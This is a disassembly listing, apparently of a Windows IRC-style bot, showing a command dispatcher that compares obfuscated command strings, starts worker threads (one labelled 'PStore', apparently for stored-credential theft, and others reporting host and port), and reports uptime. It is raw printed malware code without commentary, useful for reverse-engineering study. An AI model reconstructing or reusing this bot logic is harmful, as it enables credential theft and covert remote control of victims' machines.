push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B8C7: ; CODE XREF: sub_40A938+F6F�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B8D1: ; CODE XREF: sub_40A938+F75�j
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
jmp loc_414855
; ---------------------------------------------------------------------------
loc_40B8DE: ; CODE XREF: sub_40A938+F5F�j
cmp [ebp+arg_2C], edi
jz short loc_40B8EA
mov ebx, [ebx+8]
cmp ebx, edi
jnz short loc_40B8F1
loc_40B8EA: ; CODE XREF: sub_40A938+FA9�j
push offset dword_443F04
jmp short loc_40B8F2
; ---------------------------------------------------------------------------
loc_40B8F1: ; CODE XREF: sub_40A938+FB0�j
push ebx
loc_40B8F2: ; CODE XREF: sub_40A938+FB7�j
lea eax, [ebp+var_1AEC]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov ebx, offset aLtlec18us5q0 ; "LTLec18US5q0"
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push ebx
push offset aSS_ ; "%s %s."
push 12h
mov [ebp+var_1AF0], eax
call sub_4233DE
add esp, 10h
mov [ebp+var_1A6C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_1AF0]
push edi
push eax
push offset sub_425A1B
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1A6C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_412F27
jmp short loc_40B965
; ---------------------------------------------------------------------------
loc_40B95D: ; CODE XREF: sub_40A938+1033�j
push 32h
call dword_43718C ; Sleep
loc_40B965: ; CODE XREF: sub_40A938+1023�j
cmp [ebp+var_1A34], edi
jz short loc_40B95D
cmp [ebp+arg_14], 0
mov edi, offset aSStarted_ ; "%s started."
jnz short loc_40B98E
cmp [ebp+arg_18], 0
jnz short loc_40B998
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40B98E: ; CODE XREF: sub_40A938+103E�j
cmp [ebp+arg_18], 0
jz loc_412F27
loc_40B998: ; CODE XREF: sub_40A938+1044�j
push ebx
loc_40B999: ; CODE XREF: sub_40A938+85C6�j
push edi
loc_40B99A: ; CODE XREF: sub_40A938+5CCB�j
; sub_40A938+8367�j
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
loc_40B9A4: ; CODE XREF: sub_40A938+5292�j
add esp, 10h
jmp loc_412F27
; ---------------------------------------------------------------------------
loc_40B9AC: ; CODE XREF: sub_40A938+F38�j
; sub_40A938+F4A�j
push dword ptr [ebx]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call edi ; dword_437174
test eax, eax
jnz short loc_40B9E3
push dword ptr [ebx+4]
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
call edi ; dword_437174
test eax, eax
jnz short loc_40B9E3
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push 12h
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_40B9D3: ; CODE XREF: sub_40A938+8134�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi]
jmp loc_412BEC
; ---------------------------------------------------------------------------
loc_40B9E3: ; CODE XREF: sub_40A938+107F�j
; sub_40A938+108D�j
push dword ptr [ebx]
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
call edi ; dword_437174
test eax, eax
jnz loc_40BD3D
push 13h
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40BA47
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40BA2F
cmp [ebp+arg_18], 0
jnz short loc_40BA39
push eax
push ebx
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40BA2F: ; CODE XREF: sub_40A938+10D9�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40BA39: ; CODE XREF: sub_40A938+10DF�j
push [ebp+arg_C]
push ebx
loc_40BA3D: ; CODE XREF: sub_40A938+13EB�j
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_40BA47: ; CODE XREF: sub_40A938+10C9�j
cmp [ebp+arg_2C], 0
mov ecx, offset dword_443F0C
jz short loc_40BA59
mov eax, [ebx+8]
test eax, eax
jnz short loc_40BA5C
loc_40BA59: ; CODE XREF: sub_40A938+1118�j
push ecx
jmp short loc_40BA5D
; ---------------------------------------------------------------------------
loc_40BA5C: ; CODE XREF: sub_40A938+111F�j
push eax
loc_40BA5D: ; CODE XREF: sub_40A938+1122�j
lea eax, [ebp+var_59C]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
and [ebp+var_4E4], 0
mov [ebp+var_5A0], eax
mov eax, [ebp+arg_14]
mov [ebp+var_4EC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_4E8], eax
mov eax, [ebp+arg_20]
mov [ebp+var_4F0], eax
push dword ptr [ebx+4]
push offset aItx_n_wpamx_ ; "ITx.N.WPAmx."
call edi ; dword_437174
test eax, eax
jnz loc_40BB4B
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push offset aSPstore ; "%s PStore"
push 13h
call sub_4233DE
add esp, 0Ch
mov [ebp+var_51C], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_5A0]
push edi
push eax
push offset sub_425156
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_51C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_40BB3E
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40BB25
cmp [ebp+arg_18], 0
jnz short loc_40BB2F
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40BB25: ; CODE XREF: sub_40A938+11C9�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40BB2F: ; CODE XREF: sub_40A938+11CF�j
call ebx ; dword_43716C
jmp loc_40BD1D
; ---------------------------------------------------------------------------
loc_40BB36: ; CODE XREF: sub_40A938+120C�j
push 32h
call dword_43718C ; Sleep
loc_40BB3E: ; CODE XREF: sub_40A938+11B8�j
cmp [ebp+var_4E4], edi
jz short loc_40BB36
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40BB4B: ; CODE XREF: sub_40A938+1169�j
mov eax, [ebx+4]
test eax, eax
jz short loc_40BB6E
push offset dword_43D664
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_40BB6E
mov eax, [ebx+4]
mov [ebp+var_518], eax
jmp short loc_40BB75
; ---------------------------------------------------------------------------
loc_40BB6E: ; CODE XREF: sub_40A938+1218�j
; sub_40A938+1229�j
and [ebp+var_518], 0
loc_40BB75: ; CODE XREF: sub_40A938+1234�j
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push offset aSPstore ; "%s PStore"
push 13h
call sub_4233DE
add esp, 0Ch
mov [ebp+var_51C], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_5A0]
push eax
xor eax, eax
push eax
push ecx
push offset sub_42377D
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_51C]
mov edi, offset aSSD_ ; "%s %s (%d)."
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_40BC3B
cmp [ebp+arg_14], eax
jnz short loc_40BBEF
cmp [ebp+arg_18], eax
jnz short loc_40BBF5
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40BBEF: ; CODE XREF: sub_40A938+1290�j
cmp [ebp+arg_18], 0
jz short loc_40BC14
loc_40BBF5: ; CODE XREF: sub_40A938+1295�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 18h
loc_40BC14: ; CODE XREF: sub_40A938+12BB�j
; sub_40A938+130C�j
push 0BB8h
call dword_43718C ; Sleep
cmp [ebp+arg_2C], 0
jz short loc_40BC2C
mov eax, [ebx+8]
test eax, eax
jnz short loc_40BC46
loc_40BC2C: ; CODE XREF: sub_40A938+12EB�j
push offset dword_443F0C
jmp short loc_40BC47
; ---------------------------------------------------------------------------
loc_40BC33: ; CODE XREF: sub_40A938+130A�j
push 32h
call dword_43718C ; Sleep
loc_40BC3B: ; CODE XREF: sub_40A938+128B�j
cmp [ebp+var_4E4], 0
jz short loc_40BC33
jmp short loc_40BC14
; ---------------------------------------------------------------------------
loc_40BC46: ; CODE XREF: sub_40A938+12F2�j
push eax
loc_40BC47: ; CODE XREF: sub_40A938+12F9�j
lea eax, [ebp+var_828]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
and [ebp+var_770], 0
mov [ebp+var_82C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_778], eax
mov eax, [ebp+arg_18]
mov [ebp+var_774], eax
mov eax, [ebp+arg_20]
mov [ebp+var_77C], eax
mov eax, [ebx+4]
test eax, eax
jz short loc_40BCAC
push offset dword_43D664
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_40BCA2
mov eax, [ebx+4]
mov [ebp+var_7A4], eax
jmp short loc_40BCB3
; ---------------------------------------------------------------------------
loc_40BCA2: ; CODE XREF: sub_40A938+135D�j
xor ebx, ebx
mov [ebp+var_7A4], ebx
jmp short loc_40BCB5
; ---------------------------------------------------------------------------
loc_40BCAC: ; CODE XREF: sub_40A938+134C�j
and [ebp+var_7A4], 0
loc_40BCB3: ; CODE XREF: sub_40A938+1368�j
xor ebx, ebx
loc_40BCB5: ; CODE XREF: sub_40A938+1372�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_82C]
push ebx
push eax
push offset sub_424FC9
push ebx
push ebx
call dword_43717C ; CreateThread
mov ecx, [ebp+var_7A8]
imul ecx, 2724h
cmp eax, ebx
mov dword_46D70C[ecx], eax
jnz short loc_40BD30
cmp [ebp+arg_14], ebx
jnz short loc_40BD0E
cmp [ebp+arg_18], ebx
jnz short loc_40BD17
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40BD0E: ; CODE XREF: sub_40A938+13AF�j
cmp [ebp+arg_18], ebx
jz loc_4148CF
loc_40BD17: ; CODE XREF: sub_40A938+13B4�j
call dword_43716C ; RtlGetLastWin32Error
loc_40BD1D: ; CODE XREF: sub_40A938+11F9�j
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_40BA3D
; ---------------------------------------------------------------------------
loc_40BD28: ; CODE XREF: sub_40A938+13FE�j
push 32h
call dword_43718C ; Sleep
loc_40BD30: ; CODE XREF: sub_40A938+13AA�j
cmp [ebp+var_770], ebx
jz short loc_40BD28
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40BD3D: ; CODE XREF: sub_40A938+10B6�j
push dword ptr [ebx]
push offset aLndk50vzcqw0 ; "LNdk50vzCqW0"
call edi ; dword_437174
test eax, eax
jnz loc_40BF17
mov eax, [ebp+arg_10]
xor edi, edi
cmp [ebp+arg_2C], edi
mov [ebp+var_A28], eax
mov eax, [ebp+arg_18]
mov [ebp+var_970], eax
lea eax, [ebp+var_A24]
jnz loc_40BE7D
push offset dword_443F0C
push eax
call dword_4370A4 ; lstrcpyA
cmp [ebp+arg_30], edi
jz short loc_40BD9F
loc_40BD82: ; CODE XREF: sub_40A938+1552�j
push [ebp+var_970]
lea eax, [ebp+var_A24]
push [ebp+var_A28]
push eax
call sub_42549F
jmp loc_40D299
; ---------------------------------------------------------------------------
loc_40BD9F: ; CODE XREF: sub_40A938+1448�j
mov eax, [ebx+4]
cmp eax, edi
jz loc_40BE45
cmp [ebx+8], edi
jz loc_40BE45
cmp [ebx+0Ch], edi
jz loc_40BE45
push eax
call sub_420D92
push dword ptr [ebx+0Ch]
mov [ebp+arg_C], eax
lea eax, [ebp+var_5EC8]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 10h
push 4
pop esi
cmp [ebp+arg_4], esi
jle short loc_40BE1E
loc_40BDE4: ; CODE XREF: sub_40A938+14E4�j
mov eax, [ebx+esi*4]
cmp eax, edi
jz short loc_40BE18
push eax
lea eax, [ebp+var_3F580]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_3F580]
push 104h
push eax
lea eax, [ebp+var_5EC8]
push eax
call sub_429910
add esp, 18h
loc_40BE18: ; CODE XREF: sub_40A938+14B1�j
inc esi
cmp esi, [ebp+arg_4]
jl short loc_40BDE4
loc_40BE1E: ; CODE XREF: sub_40A938+14AA�j
push dword ptr [ebx+8]
lea eax, [ebp+var_5EC8]
push eax
push [ebp+arg_C]
loc_40BE2B: ; CODE XREF: sub_40A938+15DA�j
push [ebp+var_970]
lea eax, [ebp+var_A24]
push [ebp+arg_10]
push eax
call sub_42562E
jmp loc_414861
; ---------------------------------------------------------------------------
loc_40BE45: ; CODE XREF: sub_40A938+146C�j
; sub_40A938+1475�j ...
mov edi, offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
loc_40BE4A: ; CODE XREF: sub_40A938+239B�j
; sub_40A938+5786�j ...
cmp [ebp+arg_14], 0
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40BE74
cmp [ebp+arg_18], 0
loc_40BE59: ; CODE XREF: sub_40A938+57B9�j
; sub_40A938+816C�j
jnz loc_4146C4
push ebx
push edi
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40BE74: ; CODE XREF: sub_40A938+151B�j
; sub_40A938+57B0�j ...
cmp [ebp+arg_18], 0
jmp loc_4146BE
; ---------------------------------------------------------------------------
loc_40BE7D: ; CODE XREF: sub_40A938+1433�j
push dword ptr [ebx+4]
push eax
call dword_4370A4 ; lstrcpyA
cmp [ebp+arg_30], edi
jnz loc_40BD82
cmp [ebx+4], edi
jz short loc_40BE45
mov eax, [ebx+8]
cmp eax, edi
jz short loc_40BE45
cmp [ebx+0Ch], edi
jz short loc_40BE45
cmp [ebx+10h], edi
jz short loc_40BE45
push eax
call sub_420D92
push dword ptr [ebx+10h]
mov edi, eax
lea eax, [ebp+var_60CC]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 10h
push 5
pop esi
cmp [ebp+arg_4], esi
jle short loc_40BF07
loc_40BECD: ; CODE XREF: sub_40A938+15CD�j
mov eax, [ebx+esi*4]
test eax, eax
jz short loc_40BF01
push eax
lea eax, [ebp+var_13660]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_13660]
push 104h
push eax
lea eax, [ebp+var_60CC]
push eax
call sub_429910
add esp, 18h
loc_40BF01: ; CODE XREF: sub_40A938+159A�j
inc esi
cmp esi, [ebp+arg_4]
jl short loc_40BECD
loc_40BF07: ; CODE XREF: sub_40A938+1593�j
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_60CC]
push eax
push edi
jmp loc_40BE2B
; ---------------------------------------------------------------------------
loc_40BF17: ; CODE XREF: sub_40A938+1410�j
push dword ptr [ebx]
push offset a9ljbh07crkd_ ; "9lJBH07crkD."
call edi ; dword_437174
test eax, eax
jnz loc_40C05B
push 14h
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40BF41
mov ebx, offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_40BF41: ; CODE XREF: sub_40A938+15FD�j
mov eax, [ebp+arg_14]
mov [ebp+var_BBC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_BC0], eax
mov eax, [ebp+arg_20]
mov [ebp+var_BB8], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_C44]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push edi
mov ebx, offset aSS_ ; "%s %s."
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push ebx
push 14h
mov [ebp+var_C48], eax
call sub_4233DE
add esp, 10h
mov [ebp+var_BC4], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_C48]
push eax
xor eax, eax
push eax
push ecx
push offset sub_425F31
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_BC4]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_40C01C
cmp [ebp+arg_14], eax
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40BFF8
cmp [ebp+arg_18], eax
jnz short loc_40C002
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40BFF8: ; CODE XREF: sub_40A938+169D�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40C002: ; CODE XREF: sub_40A938+16A2�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
jmp loc_414856
; ---------------------------------------------------------------------------
loc_40C014: ; CODE XREF: sub_40A938+16EB�j
push 32h
call dword_43718C ; Sleep
loc_40C01C: ; CODE XREF: sub_40A938+168D�j
cmp [ebp+var_BB4], 0
jz short loc_40C014
cmp [ebp+arg_14], 0
jnz short loc_40C046
cmp [ebp+arg_18], 0
jnz short loc_40C050
push edi
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40C046: ; CODE XREF: sub_40A938+16F1�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40C050: ; CODE XREF: sub_40A938+16F7�j
push edi
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
jmp loc_40B035
; ---------------------------------------------------------------------------
loc_40C05B: ; CODE XREF: sub_40A938+15EA�j
push dword ptr [ebx]
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
call edi ; dword_437174
test eax, eax
jnz loc_40C1C1
push 15h
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40C085
mov ebx, offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_40C085: ; CODE XREF: sub_40A938+1741�j
mov eax, [ebp+arg_14]
mov [ebp+var_A38], eax
mov eax, [ebp+arg_20]
mov [ebp+var_A3C], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_AE8]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_AEC], eax
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_40C0C0
push ebx
call sub_42A030
pop ecx
jmp short loc_40C0C7
; ---------------------------------------------------------------------------
loc_40C0C0: ; CODE XREF: sub_40A938+177D�j
movzx eax, word_443984
loc_40C0C7: ; CODE XREF: sub_40A938+1786�j
push eax
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push offset dword_457C20
mov ebx, offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push edi
push ebx
push offset aSSOnSI ; "%s %s on: [%s:%i]"
push 15h
mov [ebp+var_A4C], eax
call sub_4233DE
add esp, 18h
mov [ebp+var_A68], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_AEC]
push eax
xor eax, eax
push eax
push ecx
push offset sub_4216DB
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_A68]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_40C16B
cmp [ebp+arg_14], eax
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40C154
cmp [ebp+arg_18], eax
jnz loc_414849
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push ebx
push edi
push dword ptr [esi+0Ch]
loc_40C149: ; CODE XREF: sub_40A938+1E28�j
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40C154: ; CODE XREF: sub_40A938+17F5�j
; sub_40A938+1E07�j
cmp [ebp+arg_18], 0
jz loc_4148CF
jmp loc_414849
; ---------------------------------------------------------------------------
loc_40C163: ; CODE XREF: sub_40A938+183A�j
push 32h
call dword_43718C ; Sleep
loc_40C16B: ; CODE XREF: sub_40A938+17EB�j
cmp [ebp+var_A30], 0
jz short loc_40C163
cmp [ebp+arg_14], 0
jnz short loc_40C1A0
cmp [ebp+arg_18], 0
jnz short loc_40C1AA
push [ebp+var_A4C]
push offset dword_457C20
push edi
push ebx
push offset aSSOnSI_0 ; "%s %s on: (%s:%i)"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_40C1A0: ; CODE XREF: sub_40A938+1840�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40C1AA: ; CODE XREF: sub_40A938+1846�j
push [ebp+var_A4C]
push offset dword_457C20
push edi
push ebx
push offset aSSOnSI_0 ; "%s %s on: (%s:%i)"
jmp loc_4148C2
; ---------------------------------------------------------------------------
loc_40C1C1: ; CODE XREF: sub_40A938+172E�j
push dword ptr [ebx]
push offset a_swwg1hqeii1 ; ".SWwg1hqeiI1"
call edi ; dword_437174
test eax, eax
jnz short loc_40C1DA
push offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push 15h
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_40C1DA: ; CODE XREF: sub_40A938+1894�j
push dword ptr [ebx]
push offset aS3dyJzo6r_0 ; "s3dY//JZo6r/"
call edi ; dword_437174
test eax, eax
jz loc_414866
push dword ptr [ebx]
push offset aDo5oa0u5m7_ ; "dO5oA/0U5m7."
call edi ; dword_437174
test eax, eax
jz loc_414866
push dword ptr [ebx]
push offset aKe3l20ufrlq0 ; "kE3L20Ufrlq0"
call edi ; dword_437174
test eax, eax
jnz loc_40C3DB
lea eax, [ebp+var_30]
push eax
call dword_4370C0 ; QueryPerformanceCounter
lea eax, [ebp+var_38]
push eax
call dword_4370BC ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_2C], eax
jl short loc_40C268
jg short loc_40C22F
cmp [ebp+var_30], eax
jbe short loc_40C268
loc_40C22F: ; CODE XREF: sub_40A938+18F0�j
cmp [ebp+var_34], eax
jl short loc_40C268
jg short loc_40C23B
cmp [ebp+var_38], eax
jbe short loc_40C268
loc_40C23B: ; CODE XREF: sub_40A938+18FC�j
push [ebp+var_34]
push [ebp+var_38]
push [ebp+var_2C]
push [ebp+var_30]
call sub_42B220
mov dword ptr [ebp+var_C], eax
mov dword ptr [ebp+var_C+4], edx
fild [ebp+var_C]
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_42A636
pop ecx
pop ecx
call sub_42A910
jmp short loc_40C26E
; ---------------------------------------------------------------------------
loc_40C268: ; CODE XREF: sub_40A938+18EE�j
; sub_40A938+18F5�j ...
call dword_437184 ; GetTickCount
loc_40C26E: ; CODE XREF: sub_40A938+192E�j
xor ebx, ebx
mov edi, eax
inc ebx
push ebx
push 0
push edi
call sub_41B932
push eax
lea eax, [ebp+var_D90]
push eax
call sub_429A33
push ebx
push dword_457E38
push edi
call sub_41B932
push eax
lea eax, [ebp+var_D28]
push eax
call sub_429A33
push ebx
push dword_457F40
push edi
call sub_41B932
push eax
lea eax, [ebp+var_D5C]
push eax
call sub_429A33
mov edi, 2710h
lea eax, [ebp+var_6B4A0]
push edi
push 0
push eax
call sub_429690
add esp, 48h
push 8
call sub_423737
test eax, eax
pop ecx
jle short loc_40C2F3
push 0Dh
call sub_423737
cmp eax, ebx
pop ecx
jge short loc_40C2F3
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
jmp short loc_40C347
; ---------------------------------------------------------------------------
loc_40C2F3: ; CODE XREF: sub_40A938+19A6�j
; sub_40A938+19B2�j
push 0Dh
call sub_423737
test eax, eax
pop ecx
jle short loc_40C312
push 8
call sub_423737
cmp eax, ebx
pop ecx
jge short loc_40C312
push offset aQ3bef_grjcn1aa ; "Q3BEf.grJCN1aA/Td0EX07M1"
jmp short loc_40C347
; ---------------------------------------------------------------------------
loc_40C312: ; CODE XREF: sub_40A938+19C5�j
; sub_40A938+19D1�j
push 0Dh
call sub_423737
test eax, eax
pop ecx
jg short loc_40C359
push 8
call sub_423737
test eax, eax
pop ecx
jg short loc_40C359
push 0Dh
call sub_423737
cmp eax, ebx
pop ecx
jl short loc_40C342
push 8
call sub_423737
cmp eax, ebx
pop ecx
jge short loc_40C378
loc_40C342: ; CODE XREF: sub_40A938+19FC�j
push offset aPJs70eukyp0 ; "P/JS70EukYp0"
loc_40C347: ; CODE XREF: sub_40A938+19B9�j
; sub_40A938+19D8�j
lea eax, [ebp+var_6B4A0]
push edi
push eax
call sub_429AEE
add esp, 0Ch
jmp short loc_40C378
; ---------------------------------------------------------------------------
loc_40C359: ; CODE XREF: sub_40A938+19E4�j
; sub_40A938+19F0�j
push offset aQ3bef_grjcn1aa ; "Q3BEf.grJCN1aA/Td0EX07M1"
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
push offset aSAndS ; "%s and %s"
lea eax, [ebp+var_6B4A0]
push edi
push eax
call sub_429AEE
add esp, 14h
loc_40C378: ; CODE XREF: sub_40A938+1A08�j
; sub_40A938+1A1F�j
lea eax, [ebp+var_D5C]
lea ecx, [ebp+var_D90]
push eax
lea eax, [ebp+var_D28]
push offset aXg4wo0gh6fy0p9 ; "xg4wO0Gh6FY0p9CIj.BYYVY."
push eax
mov eax, offset aNI427pnt0 ; "n/i4//27pnT0"
cmp [ebp+arg_18], 0
push eax
push ecx
push eax
lea eax, [ebp+var_6B4A0]
push offset aOgyzo1Qmpy1 ; "OGyZo1/qmpy1"
push eax
push offset a2ms3c_kjtek0 ; "2MS3c.kJTeK0"
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSSSSSSSS ; "%s %s %s, %s %s (%s), %s (%s), %s (%s)"
jnz short loc_40C3C7
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
jmp short loc_40C3D1
; ---------------------------------------------------------------------------
loc_40C3C7: ; CODE XREF: sub_40A938+1A80�j
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
loc_40C3D1: ; CODE XREF: sub_40A938+1A8D�j
add esp, 34h
mov eax, ebx
jmp loc_4148D2
; ---------------------------------------------------------------------------
loc_40C3DB: ; CODE XREF: sub_40A938+18CF�j
push dword ptr [ebx]
push offset aPnb_aBfzu60_0 ; "pNb.a/Bfzu60"
call edi ; dword_437174
test eax, eax
jnz loc_40C4AA
xor edi, edi
push 1
push edi
call dword_437184 ; GetTickCount
push eax
call sub_41B932
push eax
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
lea eax, [ebp+var_57C20]
push offset aSUptimeS_ ; "%s UpTime: (%s)."
push eax
call sub_429A33
add esp, 1Ch
cmp dword_457014, edi
jnz short loc_40C459
call sub_41BB45
cmp eax, edi
mov dword_457FB8, eax
jnz short loc_40C452
call sub_41BAC3
push eax
push offset aRecordUptimeS_ ; ", Record UpTime: (%s)."
lea eax, [ebp+var_1D78]
push 32h
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_1D78]
push eax
jmp short loc_40C45E
; ---------------------------------------------------------------------------
loc_40C452: ; CODE XREF: sub_40A938+1AF3�j
push offset aRecord ; ", (Record)"
jmp short loc_40C45E
